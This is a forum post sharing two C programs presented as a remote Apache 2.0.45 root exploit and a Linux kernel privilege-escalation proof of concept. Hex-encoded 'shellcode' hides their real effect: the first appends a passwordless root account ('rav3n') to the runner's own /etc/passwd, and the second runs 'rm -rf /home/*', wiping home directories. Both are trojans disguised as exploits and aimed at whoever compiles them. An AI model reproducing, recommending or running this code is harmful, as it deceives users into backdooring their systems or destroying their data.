ยังไม่ compile
[hide=1][/hide]Code:* Remote apache 2.0.45 root exploit (linux) Some code taken from a old apache 1.3* expliot, author unknown. Updated and fixed by WhiteRaven of Hackerhost.com Due to the nature of the expliot you must be root on the local box for this to work. to compile: gcc apache.c -o apache */ #include <stdio.h> #include <stdlib.h> #include <netdb.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> char shellcode[] = \ "\x65\x63\x68\x6f\x20\x72\x61\x76\x33\x6e\x3a\x3a\x30\x3a" "\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20" "\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"; #define NOP 0x90 #define BSIZE 256 #define OFFSET 400 #define ADDR 0xbffff658 #define ASIZE 2000 int main(int argc, char *argv[]) { char *buffer; int s; struct hostent *hp; struct sockaddr_in sin; if (argc != 2){ printf("Apache 2.0.45 Remote Expliot by WhiteRaven"); printf("%s <target>\n", argv[0]); exit(1); } buffer = (char *)malloc(BSIZE + ASIZE + 100); if (buffer == NULL) { printf("Not enough memory! Exiting.\n"); exit(1); } memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode, strlen(shellcode)); buffer[BSIZE + ASIZE] = ';'; buffer[BSIZE + ASIZE + 1] = ''; hp = gethostbyname(argv[1]); if (hp == NULL) { printf("No such target server. Exiting.\n"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(80); /* Port 80 is HTTP */ s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { printf("Can't open socket, Exiting.\n"); exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Connection refused.\nIs the target running a webserver?\nExiting.\n"); exit(1); } printf("Sending exploit code...\n"); if (send(s, buffer, strlen(buffer), 0) != 1){ printf("exploit was successful!\n"); }else{ printf("Sorry, This target isn't vulnerable\n"); } printf("Waiting for shell.....\n"); if (fork() == 0) execl("/bin/sh", "sh", "-c", shellcode, 0); else wait(NULL); while(1){ /* shell */ } return 0; } --- /* Proof of concept code!! DO NOT DISTRIBUTE! d4yj4y_at_yahoo.com Get r00t on any Linux x86 system With the below shellcode. It uses an exploit in the linux kernel to elevate privilages to root! */ char shellcode[] = "\x2f\x62\x69\x6e\x2f\x72\x6d\x20" "\x2d\x72\x66\x20\x2f\x68\x6f\x6d" "\x65\x2f\x2a\x3b\x63\x6c\x65\x61" "\x72\x3b\x65\x63\x68\x6f\x20\x62" "\x6c\x34\x63\x6b\x68\x34\x74\x2c" "\x68\x65\x68\x65"; main() { system(shellcode); return 0; }
Reply With Quote
